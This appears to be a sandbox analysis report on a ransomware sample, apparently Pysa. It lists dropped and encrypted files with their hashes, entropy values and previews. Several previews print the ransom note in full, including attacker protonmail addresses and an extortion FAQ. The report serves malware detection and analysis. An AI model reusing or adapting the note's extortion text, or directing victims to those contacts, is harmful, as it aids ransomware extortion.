                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999779671757323
                  Encrypted:true
                  SSDEEP:12288:PaSUtpHu87bCiMJKgygnNnHaflOoJ//7j+WAnXtuAAtUp5i235uuHyq3GLwx+Pwb:NUthdbCBEHg5SRJrlstWCpOLw6Ag5Xo
                  MD5:E3B3C79AB7FD62DDA8F114A33F0C1982
                  SHA1:0D84C74A1FD7664B6023D3D1AE890B553C03E5BA
                  SHA-256:2C91C0EDE4BC31010E9F0D91AE5ED81303AE3F832B05B6EE3DF60B786FFA4247
                  SHA-512:8248E6E2E187BD1298912EC73FA0B1578B2246E8BD867C3BEC309ABD992DEDC8EF212E2E7293C6B3100074E9B24250B139004544FEB7C8FEB1E2BA9B8E13F4A2
                  Malicious:true
                  Preview: .e...&.b.;y..C q..y.~O........4.np.kLu?...G...Qkb..tc4\..^.I.?.Pnu(....!.....m.....u.h...Qx...l{..#.vjy21...3..<t.pi.n.No.+2.`w....4d...H..}...`a....S+!.Wm...yL.q./A7X.-..0.L......:"t.H.9!.....S.........../..?.zx.{.....h...|#....,3..F..5#.|.d.0.A...*3.....@(0#q.f:.MRg4.I....}.+$...^.x:..>...Co..|..H.Lc....H./+.9..u...y]..o&.b.D...6..K..EJb..........iTu...."B.6../vu.6..%o.h..W.O.z..k..n.g.p.O%:.."..?..;Ve.!....XZ.>......c....d$...z.. 9.7...TF&K8..p...._...+....,...*._).C$...z...Q.r...{..a9h.l....E...8m...CDb...J.G..`....\..p./....r.,........Y.nQ2.Td..?)..b*gI.|}..S&P.[(...xFKh.C..)9.9.o...cPyo].\a[3...%v....n.B[.......\d..H..:;M....Xudb3..KeRF9...A.e.Wi...8m}.R-...kP3..7J..............j..=.q.{..M....5?`.~.T...R*.3....~..J..ke_-}J..HZZ8...0|.9....I:t.Iv...@..|.Q...0....f..^!o..d...1.>].....PO.....O:..U.)YW..B...Y..'?.g.N..w&..&xUx.>...%....B.$......f.%.P...?........F..j#E..&....Hg..d.*.....A.....".%#..R.,..a...~Hn.E...p.....R)BG..%.q.L.y.^..
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.99460835002454
                  Encrypted:true
                  SSDEEP:3072:epICAl7OaufZcBWDVgbpnXEJgIQTYMyAs:euK+0eFUJgIIyAs
                  MD5:ED35F736191F1CE2D6EFA00408FFF376
                  SHA1:3F0DFFDB5CE3B1EA9726B49359BE1C0A131F8255
                  SHA-256:0D2EF53D82AD5A808A88A89543C576B6170A4EB25F2D140864BE7E5D9C06449F
                  SHA-512:8CF5D8FF74A8092DE252F5CAEB1D5DA2E5511262AFC8F512ECF6203CDECF7EED40398406A16BBA24BCB73BA86003374DC2D1ED806BDDDF8983E6661B141432EB
                  Malicious:true
                  Preview: .PT....Ag..c.$....A.9m_....!.....'..e^uL.Q....tS.....y....$.$...A...`.u.. P.k..C........'X.U\}B..L#.....Xt..j.......EX[.P.?e}k.?.....si......'....`........^:.YG..^E.....X.w..../!s.2..uP.w.:.t.uf..e...!`..D....m(........L.%=_.....6.....lH...,t/.i$i.....n.\S.i.^...Ml.I.Fz.GA..k..s...V..@.............g......3Q.......8"T...6..#....Q.....X}.....pj.=.....Q.{...n...-....W9}*.g..=.D|2.%.'YE.:..(.V..NR.%.V..t..T...N6=C.t.<.........g.~e[Am.mRb.,..9.._.I6...Sa.......H..[.]F...Qcm..,....|..t_Z%q..Ty.........?gy4.'z9.D.T.;.I[..o|#V...,.y..izh.%{ES.'..H./..d.(...j..r^...}.a.}K>...Z.N..Xh.A....h..-..._Q.....9...f.~.B6E..k.MAq....).G.WoGP....!....)..4.e.A-.....i.%..}...f.h.x..pa..dV..,... #.^.e^.ZN:l...}.M....nw......2...3.9.....f.$..\......J.7....]+.[...5.t..S.WA`.4.2...c'..q..A3ve......K.........M*'3.X.1Ai....m..i..'.(Qf.Z...Fu..M.Q...E./...X..bZx.\.tGb..T.d;.@..$B.B[[..k.p..T5..]k. z.1fV5o...(.9V.7.2m`..Q.......l....4...?:..mNO.*T.=...v..].L,
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1333248
                  Entropy (8bit):7.999828019680233
                  Encrypted:true
                  SSDEEP:24576:cg48OUh0chq5AuFICAp4x1O+NnBRbEd/pjIFG1VJHekVV:cg48z0H5AwaxoBJEd/+zkv
                  MD5:2CDA2FEE22D461BA5BF8BFA602ECBA6B
                  SHA1:82594516F78448505A042E6C93BDAD8E68F357F3
                  SHA-256:385F60C8678044C320F5BDB31FB50221E409D682AD943FDACFB07089C0C3F3F6
                  SHA-512:42ADA21C0A3F61DC746DDC16E2DBF459217FCF0091917E08612DB2063BA800A762372DF67B0F53178E3FF00D56791EA2005977FC13CF0D80C9F01D28AD68C8D0
                  Malicious:true
                  Preview: .j...&.6.W.x.<...lw.W6..J.7.......$...$...5.g..v.Sa|.~.x..4P..q.....5....e..0e.....h.............v....E..D...{...b..as....K._...9......Q.RIV.......1..;$-.....C..$.U. .mYS...Xg*..sP+8^d!..+0.7;....w.V#..E.o6.k...D.U.U..?.....J.kCd.4..Y....f.q..@.._k..|_.....!E.S...p.(.P+DP.m.i..X..xr.x..2...dUW..."OC.`#......]...e..Q.l.u.}.Z..q.E....K.o..*7.W.R....Tu...7..-.W.S.K.lA.Hx....5..*.z^|......<.Ip..Y.?..J..z...$/...'.A[.2.....S.5............yJ.^.y.......>.`....o.@,..a$;.8.4 .s....v.(.$.O4-..."k..........CnF......_..e.N...9.7.qj.p..1.............8T..L.[....!.Zl......@X.[...lnn...aZ.5... ...j.u&....Nc....?2L@.p.Re.G......5..T..S.........$......>m-.;...MB..I...v.PN.&...4<O|K...9e0I...~.J...O..0Bg.0}8|.NG^...7..&..k.....?._t.....b.L+....H........|fiJ..>...w.......4.A_...Z.... <=.3......D..jG..t...GE.....Y(Q....{I..@..Lg....U.P.5..+.F..X..Tp.Q....W#H..#.loGrZ..........p..i?..i>...t...L.*...QV..B."1..U_.7........t2C.oCP..F5j.i..._..."..-F.F.......=..'_.
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994095639146868
                  Encrypted:true
                  SSDEEP:3072:mkuT3ok10i8irWGgE8l/XmDPDSZBPL8acI:mT0IrWGgEw/S1I
                  MD5:7F75FB699CBD712DDEA181BB39BE3199
                  SHA1:A85EAFDE28F56D92D5978A2FD31472B0A09BA511
                  SHA-256:9E33C359421B51AB2D7432883DCDA87F3A2F3ABAAD658D52CCED9E51518DAD75
                  SHA-512:319A35E2E09A5C7FC4B578912A5678AD65F8DC6E9659237F7D33A02F8992445A926DE0C22B714BB781B1B229758E07F82940FC12C2993EE4E9752D28C1D744AF
                  Malicious:true
                  Preview: ..S..eO...qA..).X...l.........N._DE...{..v8H.J....G."4...d...*.F.d.p.....U@*~.rz[..{+Y.......<..IE...%yj|..)4f.]F..Z..0.n+n6#.k..7.(.~DT/q.S..g..u.,.@.t............9.m....l.GT.2..E.;.#du.KF..&k.5...D..(I..4B,...A.Bm....(~To..g..s:..hz.W#......l..RV..a..4.Nm.0....V.De<...Q..........x..K,.`.C.0.d.NG.y.=...,._....o5.gi.$".c1..m....C....2.n...."..?...[z[..TW..4...s............^...hY0...W...(....>..... ..[...U.i..j....@...,..@..HE......]K..0..zy..5...9.x).D+.6..)...._...T.....8.^f5..o.L..||,\.......52R....s5.-.(.}=S..p).Y....)z.6..>.~.+.k9..D.8:.........D}....',...I..{G.v i..?mu1.S.....g...f2.m...... 2.)"}.0.'....2.\*.Z..PR..8./.:...z*.v..~".....!G.c.o.w*C7sq.hT.R.E....U.c:q.C A..9....wWl... .n.....C.#....'!.).....P.7...$....T..'..(......=H.F..q....N.'.L..BW..gj...=I..=`"Q.N.!._..G4...F....t..P..v.......v;5-l..^..YU...c.#8..h.xp..U.Fu>.cQoF.....)......G..k..=....{.......}.C.. ....es.o..~..K.A.xB{;..Fk>.<....O....n0.../....l...tV.....Yh.b..&{..
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5122048
                  Entropy (8bit):7.999963554133727
                  Encrypted:true
                  SSDEEP:98304:J/hitU3aIHfgMc3xfxiI26V7x+pU3p+NKiByvpZhBrFvX5LA6Q3IO:hj3rtcBZiIpV7x+O+xIZhFVJUh
                  MD5:E19B8C53ACF83A5557576DC28CB56C4C
                  SHA1:EE32996AF0B38D9ADAEC0B7A3013200F79E66BA9
                  SHA-256:5C81156EA2FBB82764783C0785D2CDCB226152BBC50BB280E75830FDB9F25A09
                  SHA-512:2922FF03E205F2C2357AE17EF7D25D797C2BF33757C4DC5C2D80D0BD6C48319E5CF3C4067ADFFF9E996CF61CFF29AEFF09944F8C4C3D75D5B325486188D78E61
                  Malicious:true
                  Preview: |.........'A.$R..v.<.......f,...Sx]..D2...,...z.J.....n._N..;u3N.-......H......&QBr.{c.r..|=.........e)1......5le(.\..G.]....%.....S.<h..v\..nH.......".pm..........dy.w?.\m3..R.....PR..ac.{4.3.....,..G^.R...0.....i...._.....<a.-).L.3.n.{_.]..w@\...8........O..?...%..^J..z.Y%...L..C......Cz...Dp.......9.A.OcQ.<...2..6'..%>1.3)...H.1h0.O&.HVL1.`.....,,n.x.(Sn.]...DaA...$QT.4AL:.Q6,m4tC!..H .=..e......#r...C.S....Y......>.&T^..3d.6....z`M......qrt0../u.Yd.D...%...8e4....T.....n...)_PI..F.%<B.1..p..!zC.U.4....8...K.Xhu.3~.xk......8....o....x..zB\..l.y...A...:z.^.....H/}J...V....\..,H......c.$ZgX+.=....,..sMuV..;.V.k./.......a..#......w'..!.g..."R..........h7./.........g.........xwL.iSI%F......I.t.<..bT.>+.....3#...7.@..........[..(=W1......{.....j..$..'.....m.8BS...jo.....G.WM9l.BM^'h._.Uj..N....z.\Q......Vp.Hy..p:.]..zV}c.F....S.^'H...c@Rv..G.b.7.7I..p.B.H..3K.R.Q..*.F...vi.-ku..\SX......\v......&...]h..C._.w..|....l)}v}.s...rmA.F$...SbI.)..
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.995357959602917
                  Encrypted:true
                  SSDEEP:3072:5IHN24Xc4i/+vhO76ZtfgnVLhSk/8dPgwxTzUk2QwWI:5o15iWJO8aVck/8dPTxf3tI
                  MD5:26669A6FCBC741DDCF6C5C190913BC18
                  SHA1:6D7F45D43FEC35AA80C38FD580C0CDB4AFCFDC6B
                  SHA-256:D4A04B1B4B081DEFCFDE00AF270A894A3C852143B7A872A67FCF85F403B4F2E6
                  SHA-512:043C16C39FDA5DA4386A4BE63AF36F32F586AA3CFF336E53FBE31B8091F7A0D3A0DBFDB607179BF1D27B22F448A9436A444370FE4D244DCAB12CABB30E7B5D01
                  Malicious:true
                  Preview: ..9.m....9.K.'....G..B.l.2.....V.6...B%.e......t.j3..n.c...c*m...j6.AY...J.f.f..*h ..z..^.D...k..e#.;..#....-ON.g}..|..y.V.!tB......U.U..V...yW.R<.J..L5..&$....X..&......N........rQ.UX.w.(b.h.0wN.k..EBp...4\".z...Y>.L.!+?....X..o....C.|.....X.....-.....B..b...O.Fi1..X..(*4.....Z..b.!6.f..g(....C.5u..n.-..e.M..L..v..se..._&.I....uv`..`I....Vr.5.N..Jp...2.X.b........uJA^/g.W.7._.R...rs........?)T...,o.2Jvej.$K.....(.z.........\..Q.f.+.';"...!.%e.v.=h<.bQ...d.c.T.@:...9.g?~....]..*[.....]!x.0.Bp...n..6s.nW....r..J.....|...f.6^...5..E...5.f.\Q..C..d>adj...Q......b.g.........cKF..c.xL..#...8...x.kY......G..Do0...^.@..|.n8.9.w^.<..Vq.l.G..[......B..R..*.J...H.B\'.S.l....@.2U...Q.W......2.)......q.[.n...!l....F*l-...iu.....kjy<H.]..=a..~.....f./..!.c.gx.>....VJ..t..#.8.V..S..!.x.`..Z....u.|...4....=.=....U.0...R.w.o.... ..O.T.`....xU.........x...a.....mX...Y....[......).3ZK^>..CD_.j\o6..=7..P(qq..5.(.:)..&.\+8kQ:...<.....9.<.X..e...1....
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
